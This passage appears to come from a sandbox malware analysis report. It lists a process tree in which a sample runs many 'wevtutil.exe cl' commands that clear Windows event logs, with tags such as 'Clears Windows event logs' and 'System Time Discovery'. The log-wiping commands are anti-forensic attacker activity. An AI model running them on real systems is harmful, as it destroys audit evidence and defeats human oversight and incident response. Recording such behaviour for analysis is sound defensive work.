  wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
  2⤵
  PID:936
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"
  2⤵
  PID:4336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot"
  2⤵
  PID:3956
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug"
  2⤵
  PID:1084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"
  2⤵
  PID:4076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Mprddm/Operational"
  2⤵
  PID:4120
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
  2⤵
  PID:1572
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
  2⤵
  PID:1088
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
  2⤵
  PID:2708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
  2⤵
  PID:624
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
  2⤵
  PID:3124
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
  2⤵
  - Clears Windows event logs
  PID:2008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
  2⤵
  PID:1288
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
  2⤵
  PID:4396
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
  2⤵
  PID:2296
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Ncasvc/Operational"
  2⤵
  PID:4728
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Diagnostic"
  2⤵
  PID:3192
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Operational"
  2⤵
  PID:3392
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NdisImPlatform/Operational"
  2⤵
  PID:3732
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Ndu/Diagnostic"
  2⤵
  PID:4088
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
  2⤵
  PID:1708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Network-Connection-Broker"
  2⤵
  PID:3980
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Network-DataUsage/Analytic"
  2⤵
  PID:3004
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Network-Setup/Diagnostic"
  2⤵
  PID:3916
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
  2⤵
  PID:4780
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetworkBridge/Diagnostic"
  2⤵
  PID:4584
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
  2⤵
  PID:4924
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
  2⤵
  PID:3996
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
  2⤵
  PID:728
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetworkProvider/Operational"
  2⤵
  PID:1376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Analytic"
  2⤵
  PID:4932
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Operational"
  2⤵
  PID:5060
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetworkSecurity/Debug"
  2⤵
  PID:4620
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NetworkStatus/Analytic"
  2⤵
  PID:324
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
  2⤵
  - Clears Windows event logs
  PID:4992
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
  2⤵
  - System Time Discovery
  PID:1640
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
  2⤵
  PID:4244
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
  2⤵
  PID:4124
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Ntfs/Operational"
  2⤵
  PID:4340
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Ntfs/Performance"
  2⤵
  PID:1896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Ntfs/WHC"
  2⤵
  PID:4868
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OLE/Clipboard-Performance"
  2⤵
  PID:3680
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
  2⤵
  PID:4104
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
  2⤵
  PID:3396
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"
  2⤵
  - Clears Windows event logs
  PID:1888
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"
  2⤵
  PID:220
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"
  2⤵
  PID:1328
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Operational"
  2⤵
  PID:2336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"
  2⤵
  PID:752
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OcpUpdateAgent/Operational"
  2⤵
  PID:4464
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
  2⤵
  - Clears Windows event logs
  PID:2856
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
  2⤵
  PID:3132
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
  2⤵
  PID:1196
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
  2⤵
  PID:4968
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OneBackup/Debug"
  2⤵
  PID:4508
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
  2⤵
  PID:3540
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OneX/Operational"
  2⤵
  PID:2196
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
  2⤵
  PID:3176
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-OtpCredentialProvider/Operational"
  2⤵
  PID:1340
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
  2⤵
  - Clears Windows event logs
  PID:3208
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Analytic"
  2⤵
  PID:1912
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Debug"
  2⤵
  PID:5048
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Operational"
  2⤵
  PID:4212
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
  2⤵
  PID:4920
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Partition/Analytic"
  2⤵
  PID:456
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Partition/Diagnostic"
  2⤵
  PID:3676
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
  2⤵
  PID:3388
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PerceptionRuntime/Operational"
  2⤵
  PID:2560
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PerceptionSensorDataService/Operational"
  2⤵
  PID:2748
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Analytic"
  2⤵
  PID:636
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"
  2⤵
  PID:4420
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Operational"
  2⤵
  PID:4500
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"
  2⤵
  PID:4384
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"
  2⤵
  PID:3716
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Operational"
  2⤵
  PID:3256
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Analytic"
  2⤵
  PID:860
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Certification"
  2⤵
  PID:3944
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"
  2⤵
  - Clears Windows event logs
  PID:3028
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Operational"
  2⤵
  PID:692
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PhotoAcq/Analytic"
  2⤵
  PID:3156
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PlayToManager/Analytic"
  2⤵
  PID:696
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Policy/Analytic"
  2⤵
  PID:4752
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Policy/Operational"
  2⤵
  PID:4788
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
  2⤵
  PID:868
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
  2⤵
  PID:1936
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Power-Meter-Polling/Diagnostic"
  2⤵
  PID:1772
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
  2⤵
  - Power Settings
  PID:540
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
  2⤵
  PID:464
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
  2⤵
  PID:608
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
  2⤵
  PID:5052
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
  2⤵
  PID:4284
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
  2⤵
  PID:1520
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
  2⤵
  PID:4980
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
  2⤵
  PID:4600
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerShell/Debug"
  2⤵
  PID:2204
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
  2⤵
  PID:408
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
  2⤵
  PID:3172
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PrintBRM/Admin"
  2⤵
  PID:3752
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PrintService-USBMon/Debug"
  2⤵
  PID:212
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
  2⤵
  PID:2844
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
  2⤵
  PID:4232
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
  2⤵
  PID:60
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Privacy-Auditing/Operational"
  2⤵
  PID:3464
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ProcessStateManager/Diagnostic"
  2⤵
  PID:1008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"
  2⤵
  PID:1648
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"
  2⤵
  PID:3956
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
  2⤵
  PID:1084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot"
  2⤵
  PID:4076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"
  2⤵
  PID:4120
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService"
  2⤵
  PID:1572
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Diagnostic"
  2⤵
  PID:1088
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Informational"
  2⤵
  PID:2708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Performance"
  2⤵
  PID:624
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PushNotification-Developer/Debug"
  2⤵
  PID:3124
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PushNotification-InProc/Debug"
  2⤵
  PID:2008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Admin"
  2⤵
  PID:1288
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Debug"
  2⤵
  PID:4060
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Operational"
  2⤵
  PID:956
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
  2⤵
  PID:1472
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
  2⤵
  PID:740
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
  2⤵
  PID:4128
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
  2⤵
  PID:1832
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
  2⤵
  PID:2976
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RRAS/Debug"
  2⤵
  PID:4612
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RRAS/Operational"
  2⤵
  PID:5076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RadioManager/Analytic"
  2⤵
  PID:2644
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
  2⤵
  PID:4320
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Debug"
  2⤵
  PID:4448
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Operational"
  2⤵
  PID:4848
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ReFS/Operational"
  2⤵
  PID:1136
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
  2⤵
  PID:760
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
  2⤵
  PID:4304
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
  2⤵
  PID:1608
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
  2⤵
  PID:2564
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Regsvr32/Operational"
  2⤵
  PID:1884
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
  2⤵
  PID:4620
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
  2⤵
  PID:4288
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
  2⤵
  PID:2580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
  2⤵
  PID:1140
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
  2⤵
  PID:2152
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
  2⤵
  - Clears Windows event logs
  PID:4540
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
  2⤵
  PID:2252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
  2⤵
  PID:5104
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
  2⤵
  PID:4156
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"
  2⤵
  PID:3384
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"
  2⤵
  PID:3880
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
  2⤵
  PID:1108
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"
  2⤵
  PID:4836
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Operational"
  2⤵
  PID:3152
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ResetEng-Trace/Diagnostic"
  2⤵
  PID:4844
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
  2⤵
  PID:4064
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
  2⤵
  PID:2804
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
  2⤵
  PID:1392
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
  2⤵
  PID:4748
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RetailDemo/Admin"
  2⤵
  PID:2488
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-RetailDemo/Operational"
  2⤵
  PID:2652
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime-Graphics/Analytic"
  2⤵
  PID:412
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
  2⤵
  PID:1664
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime-Networking/Tracing"
  2⤵
  PID:2120
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime-Web-Http/Tracing"
  2⤵
  PID:688
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime-WebAPI/Tracing"
  2⤵
  PID:1752
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"
  2⤵
  PID:4272
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"
  2⤵
  PID:1784
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"
  2⤵
  PID:1528
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"
  2⤵
  PID:2824
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime/CreateInstance"
  2⤵
  PID:2380
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Runtime/Error"
  2⤵
  PID:1436
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBClient/Analytic"
  2⤵
  PID:5072
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBClient/HelperClassDiagnostic"
  2⤵
  - Clears Windows event logs
  PID:5100
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
  2⤵
  PID:4252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBClient/Operational"
  2⤵
  PID:4880
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBDirect/Admin"
  2⤵
  PID:2736
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBDirect/Debug"
  2⤵
  PID:3240
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBDirect/Netmon"
  2⤵
  PID:1924
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBServer/Analytic"
  2⤵
  PID:4560
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBServer/Audit"
  2⤵
  PID:4816
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBServer/Connectivity"
  2⤵
  PID:1788
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBServer/Diagnostic"
  2⤵
  PID:1524
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBServer/Operational"
  2⤵
  PID:4280
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBServer/Performance"
  2⤵
  PID:3096
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBServer/Security"
  2⤵
  PID:3940
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Admin"
  2⤵
  PID:1216
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Informational"
  2⤵
  PID:2024
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SPB-ClassExtension/Analytic"
  2⤵
  PID:2240
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SPB-HIDI2C/Analytic"
  2⤵
  PID:708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Schannel-Events/Perf"
  2⤵
  - Clears Windows event logs
  PID:4444
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Sdbus/Analytic"
  2⤵
  PID:5032
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Sdbus/Debug"
  2⤵
  PID:4872
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Sdstor/Analytic"
  2⤵
  PID:3948
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
  2⤵
  PID:4492
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
  2⤵
  PID:3860
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SearchUI/Diagnostic"
  2⤵
  PID:4524
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SearchUI/Operational"
  2⤵
  PID:5052
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-SecureAssessment/Operational"
  2⤵
  PID:4284
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-Adminless/Operational"
  2⤵
  PID:1520
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
  2⤵
  PID:4980
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
  2⤵
  PID:4600
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"
  2⤵
  PID:2204
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"
  2⤵
  PID:408
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"
  2⤵
  PID:3172
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
  2⤵
  PID:3752
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-IdentityStore/Performance"
  2⤵
  PID:3324
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"
  2⤵
  - Clears Windows event logs
  PID:3040
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-Mitigations/KernelMode"
  2⤵
  PID:3336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-Mitigations/UserMode"
  2⤵
  PID:2800
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-Netlogon/Operational"
  2⤵
  PID:3596
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GC/Analytic"
  2⤵
  - Clears Windows event logs
  PID:2668
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"
  2⤵
  PID:1732
